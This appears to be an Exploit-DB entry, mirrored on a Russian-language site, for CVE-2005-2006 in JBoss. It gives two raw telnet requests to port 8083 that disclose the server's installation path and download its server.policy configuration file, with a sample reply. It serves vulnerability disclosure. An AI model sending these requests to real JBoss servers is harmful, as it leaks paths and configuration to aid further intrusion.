- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25842
- Проверка EDB
-
- Пройдено
- Автор
- MARC SCHOENEFELD
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2005-2006
- Дата публикации
- 2005-06-17
Код:
source: https://www.securityfocus.com/bid/13985/info
JBoss is prone to a remote information-disclosure vulnerability. The issue occurs in the 'org.jboss.web.WebServer' class and is due to a lack of sufficient sanitization of user-supplied request data.
Information that attackers can harvest through leveraging this issue may aid in further attacks against the affected service.
Example 1 (Installation path disclosure): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %. HTTP/1.0
Reply:
HTTP/1.0 400 C:\Programme\jboss-4.0.2\server\default\conf (Zugriff
verweigert)
Content-Type: text/html
Example 2 (Config file download): [4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %server.policy HTTP/1.0- Источник
- www.exploit-db.com
